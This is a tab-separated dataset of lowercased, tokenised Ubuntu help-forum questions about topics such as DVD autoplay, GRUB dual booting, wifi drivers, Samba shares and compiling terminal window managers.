463768	auto load vlc after closing dvd tray manually	i 'm trying to make my htpc experience as smooth as possible for my family . i 've set up vlc to auto launch in full screen when a dvd is entered into the internal dvd player on my htpc . however , if somebody manually ejects the dvd by hitting the button on the drive , and then inserts a new disk , it does n't auto-start vlc . i believe it 's because the dvd is not being unmounted , so when the new disk is inserted , it does n't trigger a 'mount ' and consequently does n't fire up vlc . can i force a remount when the dvd drive tray is closed , or force an unmount when it is opened manually ? also , can i quit vlc when the dvd is ejected ? and i have n't seen a button to eject the dvd from with the vlc interface , although presumably it exists somewhere . thanks .
463770	how to switch from grub to windows boot selection ?	i 'm on windows 7 , and dual booting with ubuntu 14.04.the thing is , to select os , ubuntu has defaulted me to grub , which in my opinion so much hassle because ubuntu is just for fun and my work is done from win7.how to switch from grub selection to the traditional windows boot selection screen ?
463771	copy of ubuntu linux	i am hoping you can help me . i have a windows xp machine and instead of throwing it out , i would like to install ubuntu linux on to it . however , i am having trouble trying to copy the os on to a disc and i was wondering if you knew where i can get a copy from ? i appreciate any assistance you can give on this .
463773	can not boot after grub	yesterday i was copying things from nfs to my computer and something was stuck , after a while i tried to restart my computer but it did n't work so i force powered it off . now , when i booted the machine , it got to grub and after it could n't boot . it seems like vmlinuz and initrd loading successfully ( no matter what version - 3.13 , 3.11 i tried both of them ) . all i see at the beginning is empty screen and after a while it sometimes tells me that mount points are not ready ( /tmp /boot / ) : '' the disk drive for [ some mountpoint ] is not ready yet or not present . continue to wait , or press s to skip mounting or m for manual recovery '' . except for `` / '' , it warns about all the mountpoints in fstab . also can see that `` rpcsec_gss daemon '' is failed to start . at one of my attempts it told me that there are serious problems with / , so i used livecd and fsck the disk . did n't find anything special . my questions are : 1. how can i debug the boot process verbosely and find what cause this problem ? 2. what can cause this trouble ? by the way , i have ubuntu 14.04 thanks in advance
463779	unable to switch from between consoles	i 'm a novice but want to give linux a shot . i 'm using the os again after a long break . i downloaded 14.04 and really like it so far . i just ca n't seem to get my gtx 750 ti card working . i have to stop the xserver to install the driver . when i switch to tty 3 , using alt+ctl+f3 , to run sh on the nvidia.run file that i downloaded , i get a blank screen . this happens when switching between any console and requires a restart to fix . i 'm sure it 's a simple chmod somewhere but i 'm not familiar enough with the os to begin to figure it out . thanks guys for any help . solved : the link from rinz in the comments resolved this issue for me thank you .
463780	slow wireless connection in ubuntu 14.04	i 've installed ubuntu 14.04 on my toshiba satellite c75d-a laptop . but the browsing speed and torrent speed is slow . installing things via apt-get seems to be fine though . but when i load like 4-5 tabs it takes like a whole minute for everything to load , sometimes its just loading forever . and when i download using transmission the speed is fluctuating , it gets to something like 80kb/s then immediately goes down to 0kb/s and it stays there for a while and then it goes up again but immediately goes down before it can even download a single mb . my problem seems to be related to these : wireless connection slow/inconsistent after fresh install ubuntu 14.04 ( realtek rtl8188ee ) wifi connection slow and weak on ubuntu 14.04 but none of those has an accepted answer yet .
463783	mouse rarely working correctly	i just installed 14.04 and so far my mouse has been really flakey during the install process it was working fine and on first boot it was ok too however after updating and restarting my mouse only works on panel icons iv tried sudo modprobe -r psmouse sudo modprobe psmouse which did n't do anything . the mouse is n't at fault it works just fine on windows and other machines i really have no idea whats going on .
463784	samba share intermittent	i have a 'music ' samba share on an ubuntu htpc which i 'm using to share music to my sonos system . i 'm also logged in to ssh from my macbook to the ubuntu server . i 've successfully added the share to sonos , but half way through indexing it says that my share is unavailable . in my terminal on my mac it kicks me out of ssh with `` write failed : broken pipe '' and when i try to reconnect , i get : ssh : connect to host 192.168.1.10 port 22 : connection refused . i can still ping the ubuntu server from my macbook . if i reboot the ubuntu server , all is well again , but then the connection breaks again at some point randomly . how can i debug what is happening when i loose connection , and what may be causing it ? n.b . i have a suspicion it may be because i have a potentially suspect router/wap setup . they are just cheap home d-link hardware .
463785	can not uninstall truecrypt	i installed truecrypt from their website ( .tar.gz file ) extracted through the archive manager to /usr/share/truecrypt . i no longer need the app but i can not uninstall it through sudo apt-get remove i get an error message : 'virtual packages like truecrypt can not be removed ' . all of the sub-directories and files in /usr/share/truecrypt have a padlock symbol on them . i do n't know how to remove unwanted apps beyond these basics , i 'm hoping you can help . i have a small ( memory ) , elderly toshiba satelite laptop so it does n't need to carry any baggage . thanks , david
463787	trying to patch k10 optimized zen kernel , getting invalid option	hi this is my first try on askubuntu , i hope you can understand what i say here 's the thing , i 'm trying to patch a kernel , but patch says i put an invalid option in , which i have no idea where it is or what it is root @ guilherme-hp-pavilion-dv6-notebook-pc : /usr/src/zen-kernel-3.14-master # patch -p1 home/guilherme/downloads/kernel-314-gcc49-0.patch -march=amdfam10 patch : invalid option -- 'a' patch : try 'patch -- help ' for more information .
463791	know programs in cache	i have this situation with ram and swap at the moment : $ free -h total used free shared buffers cached mem : 7,7g 7,5g 159m 100m 75m 5,9g -/+ buffers/cache : 1,5g 6,1g swap : 7,9g 408m 7,5g and i was wondering ... is there a way to know what programs/data are ram-cached and/or from which process do they come from ? thank you very much in advance . edit : to know the programs/data in swap follow the link provided by @ xubu-tur .
463792	is there any way for assigning external metadata to files ?	i need a way of assigning tags and numbers ( like rating , importance , etc ) to my files and also be able do queries and file operations based on these metadata . just like a photo management software ( e.g . f-spot ) but for documents ( pdf , djvu , epub , etc ) . this can be a file manager with extra abilities or a file indexing system . the only thing i 've found so far is recoll however it does n't allow me to assign tags to files . by the way , i 've been using xfce for quite a while so if gnome has such a software built-in , i may not know about it .
463796	unstable wifi connection on ubuntu 14.04 , stable on windows 7	as in the title , my wifi connection is unstable with my ubuntu 14.04 box ; for 3 minutes it works , and then for 3 minutes it is down , and again it is up . my network applet says that it is always connected to the network even when internet does not work . on windows 7 it works with no interruption . what can i do to do some diagnostic of my system ? additions in my kern.log there are a lot of this repeated all over a lot of time may 10 11:24:56 laptop kernel : [ 16.068733 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready may 10 11:24:56 laptop kernel : [ 16.071742 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready may 10 11:27:29 laptop kernel : [ 169.045306 ] wlan0 : authenticate with 0c:37 : dc : a9:40:81 may 10 11:27:29 laptop kernel : [ 169.062439 ] wlan0 : send auth to 0c:37 : dc : a9:40:81 ( try 1/3 ) may 10 11:27:29 laptop kernel : [ 169.064467 ] wlan0 : authenticated may 10 11:27:29 laptop kernel : [ 169.066174 ] wlan0 : associate with 0c:37 : dc : a9:40:81 ( try 1/3 ) may 10 11:27:29 laptop kernel : [ 169.069739 ] wlan0 : rx assocresp from 0c:37 : dc : a9:40:81 ( capab=0x431 status=0 aid=1 ) may 10 11:27:29 laptop kernel : [ 169.069806 ] wlan0 : associated may 10 11:27:29 laptop kernel : [ 169.069823 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready
463798	how to check if a ttf file contains a certain character ?	using the command line , how can i check if a *.ttf file contains a certain character ? i want to know if the font-file ubuntu-r.ttf contains the u+2007 ( figure space ) character .
463799	change the default screen brighthness	hi im using xubuntu 14.04 with linux 3.13.0-24 every time my screen goes dark ( activating the screen saver or so ) my current screen brightness is set to some default value how can i change this default value ? is it hardware specific ?
463801	could not load nvidia-uvm	i want to use cuda on my pc ( using bumblebee ) , but whenever i want to start a cuda-driven program , i get the error modprobe : fatal : module nvidia-uvm not found . i already installed nvidia-337-uvm via apt-get , but nvidia-modprobe can not find the module . so , what am i doing wrong ? system is ubuntu 14.04 . thank you !
463802	replacement for org.freedesktop.hal ?	several times ago i wrote a small python script , which used d-bus and listens for hal messages do to some magic in my desktop session after a specific usb device was plugged on/off . after switching to ubuntu 13.10 , the script gets broken to the absence of some d-bus interfaces related to hal and/or new the upstart facility . concrete , my script attached to messages from iface=org.freedesktop.hal and member=/org/freedesktop/hal/manager and the event `` deviceadded '' . after caching such a signal , it read some device details from supplied the message properties . hal seems to be deprecated and the interface is not longer available in ubuntu . however , i 've started monitoring d-bus for the messages emmited and only observed the following : signal sender=:1.0 - > dest= ( null destination ) serial=3812 path=/com/ubuntu/upstart ; interface=com.ubuntu.upstart0_6 ; member=eventemitted string `` usb-device-removed '' array [ string `` kernel=1-1.3.3 '' string `` devpath=/devices/pci0000:00/0000:00:14.0/usb1/1-1/1-1.3/1-1.3.3 '' string `` devname=/dev/bus/usb/001/011 '' string `` subsystem=usb '' ... ... . ] so , the problem here is : the path and interface identiefiers contain `` ubuntu '' which is a flavour specific identifier and a no go from programmers perspective . question is : is there any other elegant way to re-establish the described funcionality and fix my script ? i do n't want to listen to vendors bound id since this will break porability . help on this topic is highly appreciated ! thanks
463803	ubuntu 14.04 and amazon	how do i remove amazon completely from ubuntu 14.04 . every time i try to start amazon in unity quickstart button on the left , the system halts and nothing works . if i donât touch this amazon start button , ubuntu 14.04 works fine and firefox works normally . synaptic-manager does not recognize amazon for some reason or unity search does not find amazon . so how to remove this amazon ,
463805	wireless driver like wifi not working	my wireless driver is not working so bluetooth and wifi are not working in ubuntu 12.04 . i have tried to check for additional drivers but no additional is required . even i can not set my own wifi network . actually wifi is showing off and it is not getting on . wireless network is inactive .
463807	how to install requests module for python 3.1 ubuntu server 10.04 ?	i have a ubuntu server . ( 10.04 ) i do n't install requests module . i try pip and other methods . usually ; $ sudo pip install requests traceback ( most recent call last ) : file `` /usr/local/lib/python3.1/dist-packages/pip-1.5.5-py3.1.egg/pip/_vendor/requests/packages/urllib3/packages/ssl_match_hostname/__init__.py '' , line 3 , in < module > from ssl import certificateerror , match_hostname importerror : can not import name certificateerror during handling of the above exception , another exception occurred : traceback ( most recent call last ) : file `` /usr/local/lib/python3.1/dist-packages/pip-1.5.5-py3.1.egg/pip/_vendor/requests/packages/urllib3/packages/ssl_match_hostname/__init__.py '' , line 7 , in < module > from backports.ssl_match_hostname import certificateerror , match_hostname importerror : no module named backports.ssl_match_hostname during handling of the above exception , another exception occurred : traceback ( most recent call last ) : file `` /usr/local/bin/pip '' , line 9 , in < module > load_entry_point ( 'pip==1.5.5 ' , 'console_scripts ' , 'pip ' ) ( ) file `` /usr/local/lib/python3.1/dist-packages/distribute-0.6.49-py3.1.egg/pkg_resources.py '' , line 345 , in load_entry_point return get_distribution ( dist ) .load_entry_point ( group , name ) file `` /usr/local/lib/python3.1/dist-packages/distribute-0.6.49-py3.1.egg/pkg_resources.py '' , line 2382 , in load_entry_point return ep.load ( ) file `` /usr/local/lib/python3.1/dist-packages/distribute-0.6.49-py3.1.egg/pkg_resources.py '' , line 2088 , in load entry = __import__ ( self.module_name , globals ( ) , globals ( ) , [ '__name__ ' ] ) file `` /usr/local/lib/python3.1/dist-packages/pip-1.5.5-py3.1.egg/pip/__init__.py '' , line 11 , in < module > from pip.vcs import git , mercurial , subversion , bazaar # noqa file `` /usr/local/lib/python3.1/dist-packages/pip-1.5.5-py3.1.egg/pip/vcs/mercurial.py '' , line 9 , in < module > from pip.download import path_to_url file `` /usr/local/lib/python3.1/dist-packages/pip-1.5.5-py3.1.egg/pip/download.py '' , line 22 , in < module > from pip._vendor import requests , six file `` /usr/local/lib/python3.1/dist-packages/pip-1.5.5-py3.1.egg/pip/_vendor/requests/__init__.py '' , line 58 , in < module > from . import utils file `` /usr/local/lib/python3.1/dist-packages/pip-1.5.5-py3.1.egg/pip/_vendor/requests/utils.py '' , line 25 , in < module > from .compat import parse_http_list as _parse_list_header file `` /usr/local/lib/python3.1/dist-packages/pip-1.5.5-py3.1.egg/pip/_vendor/requests/compat.py '' , line 7 , in < module > from .packages import chardet file `` /usr/local/lib/python3.1/dist-packages/pip-1.5.5-py3.1.egg/pip/_vendor/requests/packages/__init__.py '' , line 3 , in < module > from . import urllib3 file `` /usr/local/lib/python3.1/dist-packages/pip-1.5.5-py3.1.egg/pip/_vendor/requests/packages/urllib3/__init__.py '' , line 16 , in < module > from .connectionpool import ( file `` /usr/local/lib/python3.1/dist-packages/pip-1.5.5-py3.1.egg/pip/_vendor/requests/packages/urllib3/connectionpool.py '' , line 31 , in < module > from .packages.ssl_match_hostname import certificateerror file `` /usr/local/lib/python3.1/dist-packages/pip-1.5.5-py3.1.egg/pip/_vendor/requests/packages/urllib3/packages/__init__.py '' , line 3 , in < module > from . import ssl_match_hostname file `` /usr/local/lib/python3.1/dist-packages/pip-1.5.5-py3.1.egg/pip/_vendor/requests/packages/urllib3/packages/ssl_match_hostname/__init__.py '' , line 10 , in < module > from _implementation import certificateerror , match_hostname importerror : no module named _implementation i guess i have already setup pip 3.1 . but following $ pip -v then i see same problem . how to install requests module for python 3.1 ubuntu server 10.04 ?
463808	`` error loading operating system '' , while trying to install ubuntu 14.04 on windows 7 netbook with usb stick	i 'm trying to get ubuntu 14.04 onto a windows 7 starter netbook . i 'm trying to load it from a usb stick as it does n't have a cd drive and it keeps saying 'error loading operating system ' . i 've made a partition for ubuntu and tried it without and it still wont load . please help . thanks , ben .
463809	unable to open any of the disk except the one in which ubuntu is installed	i installed ubuntu a few days back on my laptop with windows 8 previously installed . now whenever i start my laptop i do n't have any option to go to windows and i have to use ubuntu only . but in ubuntu also i am unable to access any of my personal drives . it says `` error in mounting '' with a long message .
463810	libreoffice 4.2 launch oddities in ubuntu 14.04	with the upgrade to 14.04 , my libreoffice launches became noticeably glitchy . with libo 4.2.3.3 , the menu bars would overlap for about 10secs , then the whole app would `` grey out '' for another 10secs or so . subsequent launches were better , but the spinner would keep spinning for about 10secs+ after libo opened . it was n't clear whether this was a libo issue , or ubuntu , since the two upgrades came at the same moment . the issue was partially resolved in an asklibreoffice q & a by enabling `` quick start '' . today i got the libreoffice 4.2.4.2 update , and the first-time launch is very quick , but the lingering `` busy pointer '' /spinner issue continues . ( another user has posted a video of this behaviour on youtube . ) has anyone else experienced this behaviour ? any explanations or resolutions ? many thanks !
463812	how to optimally connect to an ubuntu desktop ( unity )	after enabling an ubuntu desktop for remote desktop connections ( via the desktop sharing preferences ) , i am trying to gather how should i actually connect to it from a remote , other , ubuntu desktop . i found no command line tools installed by default on my ubuntu desktop for actually connecting to a remote desktop other than remmina , or am just ignorant about them . what is the most quality way to actually have a remote desktop session ? ( ubuntu versions of interest are 13.10 and 14.04 ) . importantly , my target ubuntu desktop is using the default unity desktop - i guess that may matter . in this question i assume it 's most straightforward to connect from a remote ubuntu desktop , rather than a remote ubuntu server ( that typically wo n't have graphics libraries installed ) . and that it works best connecting from another ubuntu rather than from , say , windows . i just like ubuntu desktops for now . since most questions here are about connecting from windows , and focus on enabling the target desktop rather than how to connect to it , i figured i would post this question as a new one .
463814	dual booting windows 8.1 and ubuntu 14.04 , hard disk partitioning	i have a sony vaio vpcf121fx laptop with windows 8.1 currently installed in it..i have never dual booted ubuntu in my laptop before..i have a 1 tb hard disk and its divided into c : ,d : ,e : and f : partitions with c : storing the current windows 8.1 os ... .i want to allocate about 25 gb of storage space for ubuntu ... and want to allocate that 25 gb memory from e : drive which currently has 300 gb free out of 345 gb ... how do i go about doing it ... i have a vague idea about shrinking the drive or something..but i dont know anything about it ... could someone please explain the exact steps that i must follow in order to ensure that i successfully install ubuntu 14.04 without losing the data stored in the hard disk currently ?
463815	flashy boot in 14.04 please help !	i 'm having a problem : when i boot it comes with a black screen that has a purple frame then it goes blank after it is blank for 10 sec then it flashes and comes ubuntu ... ... then it ask me password . is there a way to fix it so it does n't flash and boots normally ?
463817	dual monitor remote desktop	how should i manage with remote desktop when both controlled and controller ubuntu desktops have two monitors active ? is it supported to `` remote '' both monitors ?
463819	gradient backgrounds gives default wallpaper on login screen	today i decided that i was to use a gradient as my ubuntu wallpaper , generated by ubuntu ( not an image ) . it works fine when logged in and when locking the screen , but when i need to actually log into the system it show the default ubuntu wallpaper . i run ubuntu 14.04 lts . my previous wallpaper was not the default one . it 's an issue for me to use images as gradients simply because i am going change the colors from time to time and this should not happen ( my opinion ) . i am grateful for any help i may get and i 'm glad to give you any information you may request concerning my system , not my motives . sincerely . p.s . i am well aware of that i can have separate wallpapers for login and desktop and i know i can create gradient images . i 'm looking for a solution to the issue not an alternative .
463821	connected to router with wlan stick but no internet	similarly to this post http : //ubuntuforums.org/showthread.php ? t=2125952 & highlight=11n_disable that is , i dont get any internet traffic while being a connected to the router . i am using a wlan stick ( wlan1 ) instead of the built in wifi chip ( wlan0 ) to get a better connection . the built in chip is working , but when switching to the wlan stick , i get a very good conection but no traffic . here is the output of the script that was posted in the above mentioned post : https : //dl.dropboxusercontent.com/u/26724910/wireless-info.txt i highly apprechiate any ideas of how to resolve this problem . thanks ! ! !
463822	unity does not launch in ubuntu 14.04	i updated from 13.10 from 14.04 a few weeks ago , and it was working fine . but last night , after a login the wallpaper shows up , but the unity does not , and nothing else . the weird thing is , that if i login as a guest , it works 100 % . this answer did n't solve my issue , and it 's for ubuntu 13.04 .
463824	ubuntu 14.04 grid compiz plugin different than on fedora	i launched ubuntu 14.04 live cd and fedora 20 live cd , and noticed that grid plugins in compiz are differnet . on ubuntu it has windows like snapping features , and in fedora it can only resize and move windows using key combination . ubuntu has modified version of grid plugin ?
463825	does ubuntu 14.04 lts work with only 736mb of ram ?	i want to install it on my old desktop pc . here is it 's specs : cpu : intel pentium 4 @ 2.4ghz ram : 736 mb vram : 256mb hdd : 120gb i can install the following oses on it : windows vista home basic w/sp2 mac os x v.10.5.8 `` leopard '' ubuntu 14.04 lts ?
463826	just installed 14.04 to my laptop but cant open a game that i played on my old ubuntu14.04 pc	i have just installed ubuntu 14.04 on my laptop , but i cant play a game called do n't starve , but i could play it on my old pc with ubuntu 14.04 . i installed drivers too . what can i do ? hardware and os : processor : intel® core™ i5-3210m cpu @ 2.50ghz × 4 graphics : geforce 610m/pcie/sse2 ram : 5.7 gb os : ubuntu 14.04 lts
463829	any screenshot application that supports hidpi ?	in a computer with a hidpi screen ( 3200x1800 ) , with ubuntu 14.04 and cinnamon , gnome-screenshot ( 3.10.1 ) captures images at half the resolution ( 1600x900 ) , so the capture appears blurry . i 've tried kazam ( 1.4.4-1 ) and the behaviour is the same . so far i 've only had some success with kgrab , but the image gets sometimes corrupted , probably related to using cinnamon . is there any other screenshot application that supports hidpi ?
463830	sleep mode problem	i 've jumped the ship and i am sinking into dark waters of linux.. : - ) hopefully to see bright future . i need some assistance or guidance as i am new to linux . i have installed latest version of ubuntu on my aspire s7-392 . i had some issues with `` fake '' raid so i 've got rid off it and i was able to install ubuntu . i have one major issue that is important to me and that is laptop not going into suspend mode when powered from battery causing complete discharge when lid is closed . when i try to suspend it with the lid opened to see what is happening i can see screen going black , then flicker and back to login screen immidiatelly . can you help me to fix this issue ? thanks charles it 's working now . not really sure why but it is ...
463841	in guest session , google chrome wo n't start and hibernation is missing in menu	in guest session , hibernate missing in menu and google chrome wo n't start from dash . i have enabled hibernation , as it works without problems . when i click on chrome icon from dash , nothing happens . however , firefox works well . any ideas ?
463842	change display language for pinned directories/locations	on ubuntu 14.04 / gnome classic i changed the display language from english to italian . i also confirmed that user directories should be renamed . however , references to user directories in places ( posizioni ) menu still show english names they also stopped working , because they point to wrong directories . eg . clicking on documents results in an error saying that ~/documents does n't exist ( because it 's now ~/documenti ) . how can i fix this ? where can i edit or remove them ? i already checked that : .config/user-dirs.dirs contains correct paths .config/gtk-3.0/bookmarks contains correct paths ( bookmarks shown on the screenshot with italian names work fine ) .
463846	ca n't login to my account , i know the password	i use xubuntu 14.04 64 bit . i was watching a movie , the desktop froze ( as usual duh ! ) , i logged out using a terminal , and could n't log in to my account after that , i 'm using a terminal . i type my password , it seems to log in , then it logs me out again ! i saw many questions like mine , they had brilliant answers : logging in using tty ! great idea , except that even in tty , i get the same error wrong password thing , there is no way to run anything that requires sudo ! go to grub and do stuff ! great idea ! except that i have hidden grub , it was annoying . editing it requires sudo . holding shift shows loading grub but after that , it continues booting to xubuntu , as if i 'm not pressing anything using live cd ? i do n't know about that , did n't try it , anyway i do n't have the live cd , i gave it away and deleted the iso , i have other cds though , debian , mint , arch and crunchbang . update i had boot repair disk , i used that to repair grub , then went to ubuntu recovery mode and mount -rw -o remount / passwd myaccount i entered my password but i still have the same problem , i have another account myacount2 i ca n't login to that either , i can only login to guest update 2 i managed to fix myaccount2 which is my backup account by reseting the password , but i ca n't fix the main account , the problem could not be fix by simply resetting the password . update 3 i am now able to login to my account through tty , i also created myaccount3 with sudo privileges , i removed lightm and installed gdm , did n't fix it , reinstalled fglrx , did n't fix it , startx did n't work . update 4 i can confirm that it is xfce error , because i installed e17 and it 's working now
463848	ubuntu 14.04 stay to the loading page after an update	i use ubuntu 14.04 with gnome 3 . i updated ubuntu yesterday . now , i am trying to boot and it stay as the gnome loading screen . i pressed escape and i have this trace : gnome display manager fail and the process is very slow for stopping system v runlevel compatibility and stating cups printing spool/server . i tried do ctrl+alt+f1 to go in the terminal and i tried to remove cups . the problem is the same . i also tried to do an update and to check packages via the grub menu without success . it 's hard to work on the problem because i do n't know what is the cause of the bug . can someone help me ?
463851	`` gnutls_handshake ( ) failed '' while downloading software	i recently upgraded to ubuntu 14.04 from 12.04 . now i am facing some problems while trying to install new software ( tried via synaptic package manager and apt-get ) . this is the error i am getting in synaptic when i try to install unrar : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/universe/u/unrar-free/unrar-free_0.0.1+cvs20071127-2_amd64.deb gnutls_handshake ( ) failed : handshake failed i am not able to install any new software and when i give `` sudo apt-get update '' , i get so many errors all stating that handshake failed .
463855	warning when piping apt and grep	i 'm running ubuntu 14.04 , with apt 1.0.1ubuntu2 for amd64 . i noticed that running : sudo apt search lib | grep nss this warning message is returned : warning : apt does not have a stable cli interface yet . use with caution in scripts . and after the output of the search results , filtered by grep ( which is the same result obtained with apt-cache search lib | grep nss ) what does it mean exactly this warning ?
463857	best phtoto editor software for ubuntu 14 ?	can anyone suggest me which photo editor is the best editor for ubuntu 14 .
463858	change logitech unifying reciever frequency band ?	recently , i bought a logitech m570 wireless trackball mouse . while i am very happy with it overall , one issue is nagging me . every so often , the mouse will experience a input lag , so movement is jumpy instead of smooth . this can be very annoying when i need to perform precise movements . after doing some google searching , i have found two possible causes of my problem . the gpu is performing intensive operations . this is unlikely , since it has happened during general useage and my gpu ( geforce gts 620 ) can handle operations such as watching videos very well . there is interference in my the logitech unifying receiver 's frequency band . this seems the much more likely problem , so i have performed some former research . after a look on wikipedia , i verified the receiver uses the 2.4 ghz frequency band . however , the spec seems to suggest it jumps between frequencies in its band like bluetooth , which makes it hard to verify whether this is the cause of my problem . after a look at the frequencies used by nearby wifi networks , i have found that two are in the 2.4 ghz range as well . below is the output of sudo iwlist wlan0 scan | grep frequency | sort | uniq -c | sort -n. 1 frequency:2.437 ghz ( channel 6 ) 3 frequency:2.412 ghz ( channel 1 ) i am by no means an expert in wireless networking , but this does seem to help verify my theory that the receiver is in fact experiencing interference because it is jumping to these frequencies . i can also verify that my usb wifi adapter is adjacent to my receiver 's usb port , which could be causing some problems as well . the wifi adapter only supports the 2.4 ghz band , sadly , so preventing interference that way would be problematic , since i would be limited to jumping usb ports . below is the output of iwlist wlan0 channel . wlan0 14 channels in total ; available frequencies : channel 01 : 2.412 ghz channel 02 : 2.417 ghz channel 03 : 2.422 ghz channel 04 : 2.427 ghz channel 05 : 2.432 ghz channel 06 : 2.437 ghz channel 07 : 2.442 ghz channel 08 : 2.447 ghz channel 09 : 2.452 ghz channel 10 : 2.457 ghz channel 11 : 2.462 ghz channel 12 : 2.467 ghz channel 13 : 2.472 ghz channel 14 : 2.484 ghz current frequency:2.412 ghz ( channel 1 ) so , my question is , is it possible to change the frequency band of my receiver ? if so , how ? if anybody can come up with a better solution , please feel free to provide that as an answer as well .
463859	keyboard not working properly	i just installed ubuntu 13.10 on top of my windows7 . every thing is working fine , but my keyword is acting weirdly , for example now : when i press @ it out put `` and esc does n't do anything and pressing | outputs > . joe
463861	bluetooth adapter not found in hp pavillion 15-e015tx ubuntu 14.04 lts	earlier i installed ubuntu 12.04 lts and my laptop was showing `` no bluetooth adapters found '' and bluetooth icon was not appearing in the panel . also wifi switch ( f12 ) was not getting on but still wifi and ethernet were working fine . now i installed ubuntu 14.04 lts but the bluetooth problem remains same . my laptop is having bluetooth driver : 07:00.1 bluetooth : ralink corp. rt3290 bluetooth and rfkill list command : 0 : phy0 : wireless lan soft blocked : no hard blocked : no
463862	change gnome-screenshot auto-save-directory in ubuntu gnome 14.04	configuring with dconf or gconf as suggested in this post worded on ubuntu gnome 13.10 ( i tried and succeeded ) . but does not work on ubuntu gnome 14.04 . how to change auto-save-directory of gnome-screenshot on ubuntu gnome 14.04 ?
463865	trying to install terminal window managers	i 'd like to try some terminal window managers such as viper window manager ( vwm ) and twin ( `` textmode window '' ) , but i 'm having difficulties getting them running in ubuntu . are packages available for these or other similar efforts or are there some guidelines for installation ? edit : i have added below a description of the specific difficulties i am encountering . initially , i describe my attempt at installing viper window manager , then i describe my attempt at installing twin . for both attempts , problems are encountered in compiling . for the case of viper window manager , there are many undefined references . for the case of twin , there appears to be a formatting problem in the make procedures . i do not know how to proceed with either of these problems and would appreciate any ideas you might have . thanks . viper window manager the prerequisites listed for viper window manager are as follows : glib 2.8+ libpseudo libviper 1.4.5+ libgpm ncurses 5.4+ install glib 2.40.0 wget http : //ftp.acc.umu.se/pub/gnome/sources/glib/2.40/glib-2.40.0.tar.xz tar -xvf glib-2.40.0.tar.xz cd glib-2.40.0/ ./configure make sudo make install install libpseudo wget http : //garr.dl.sourceforge.net/project/libpseudo/libpseudo-1.2.0.tar.gz tar -xvf libpseudo-1.2.0.tar.gz cd libpseudo/ make sudo make install install libgpm , ncurses and libviper wget http : //kent.dl.sourceforge.net/project/libviper/libviper-1.4.6.tar.gz tar -xvf libviper-1.4.6.tar.gz cd libviper/ sudo apt-get install -y ncurses-dev sudo apt-get install -y libgpm-dev make sudo make install # the file viper.h is in the directory /usr/local/include now . # the file libviper.so is in the directory /usr/local/lib now . install viper window manager wget http : //garr.dl.sourceforge.net/project/vwm/vwm-2.1.3.tar.gz tar -xvf vwm-2.1.3.tar.gz cd cd vwm/ make at this point , there is a problem . the abbreviated terminal output is as follows : /tmp/ccnngi2w.o : in function `vwm_init ' : /home/user/vwm/vwm/vwm.c:200 : undefined reference to `viper_screen_get_wallpaper' /home/user/vwm/vwm/vwm.c:202 : undefined reference to `g_malloc0' /tmp/ccnngi2w.o : in function `main ' : /home/user/vwm/vwm/vwm.c:87 : undefined reference to `g_module_supported' /home/user/vwm/vwm/vwm.c:130 : undefined reference to `g_thread_init' /home/user/vwm/vwm/vwm.c:132 : undefined reference to `viper_init' /home/user/vwm/vwm/vwm.c:134 : undefined reference to `viper_set_border_agent' /home/user/vwm/vwm/vwm.c:135 : undefined reference to `viper_set_border_agent' /home/user/vwm/vwm/vwm.c:142 : undefined reference to `viper_kmio_dispatch_set_hook' /home/user/vwm/vwm/vwm.c:145 : undefined reference to `viper_screen_redraw' /home/user/vwm/vwm/vwm.c:149 : undefined reference to `psthread_init' /home/user/vwm/vwm/vwm.c:150 : undefined reference to `psthread_add' /home/user/vwm/vwm/vwm.c:151 : undefined reference to `psthread_add' /home/user/vwm/vwm/vwm.c:178 : undefined reference to `psthread_run' /home/user/vwm/vwm/vwm.c:172 : undefined reference to `shmq_msg_get' /home/user/vwm/vwm/vwm.c:181 : undefined reference to `psthread_run' /home/user/vwm/vwm/vwm.c:186 : undefined reference to `viper_end' /tmp/ccdfrjqi.o : in function `vwm_bkgd_simple ' : /home/user/vwm/vwm/vwm_bkgd.c:54 : undefined reference to `viper_thread_enter' /home/user/vwm/vwm/vwm_bkgd.c:56 : undefined reference to `viper_wresize' /home/user/vwm/vwm/vwm_bkgd.c:65 : undefined reference to `window_fill' /home/user/vwm/vwm/vwm_bkgd.c:70 : undefined reference to `wattr_on' /home/user/vwm/vwm/vwm_bkgd.c:71 : undefined reference to `mvwprintw' /home/user/vwm/vwm/vwm_bkgd.c:72 : undefined reference to `wattr_on' /home/user/vwm/vwm/vwm_bkgd.c:74 : undefined reference to `viper_thread_leave' /home/user/vwm/vwm/vwm_bkgd.c:59 : undefined reference to `viper_color_pair' /tmp/ccdfrjqi.o : in function `vwm_bkgd_bricks ' : /home/user/vwm/vwm/vwm_bkgd.c:110 : undefined reference to `viper_thread_enter' /home/user/vwm/vwm/vwm_bkgd.c:112 : undefined reference to `viper_wresize' /home/user/vwm/vwm/vwm_bkgd.c:113 : undefined reference to `wattr_off' /home/user/vwm/vwm/vwm_bkgd.c:146 : undefined reference to `wattr_on' /home/user/vwm/vwm/vwm_bkgd.c:147 : undefined reference to `mvwprintw' /home/user/vwm/vwm/vwm_bkgd.c:148 : undefined reference to `wattr_on' /home/user/vwm/vwm/vwm_bkgd.c:150 : undefined reference to `viper_thread_leave' /home/user/vwm/vwm/vwm_bkgd.c:121 : undefined reference to `viper_color_pair' /home/user/vwm/vwm/vwm_bkgd.c:128 : undefined reference to `wmove' /home/user/vwm/vwm/vwm_bkgd.c:129 : undefined reference to `waddch' /home/user/vwm/vwm/vwm_bkgd.c:136 : undefined reference to `viper_color_pair' /home/user/vwm/vwm/vwm_bkgd.c:141 : undefined reference to `window_fill' ... many similar errors , removed for the purposes of post brevity ... /tmp/cchlyq3m.o : in function `vwm_sigset ' : /home/user/vwm/vwm/vwm_signals.c:38 : undefined reference to `g_malloc0' /home/user/vwm/vwm/vwm_signals.c:46 : undefined reference to `g_free' /tmp/cchlyq3m.o : in function `vwm_backtrace ' : /home/user/vwm/vwm/vwm_signals.c:61 : undefined reference to `endwin' /tmp/ccrc2yxa.o : in function `vwm_fmod_wndlist ' : /home/user/vwm/vwm/vwm_wndlist.c:45 : undefined reference to `viper_window_find_by_class' /home/user/vwm/vwm/vwm_wndlist.c:47 : undefined reference to `viper_thread_enter' /home/user/vwm/vwm/vwm_wndlist.c:49 : undefined reference to `viper_deck_get_wndlist' /home/user/vwm/vwm/vwm_wndlist.c:50 : undefined reference to `g_strv_length' 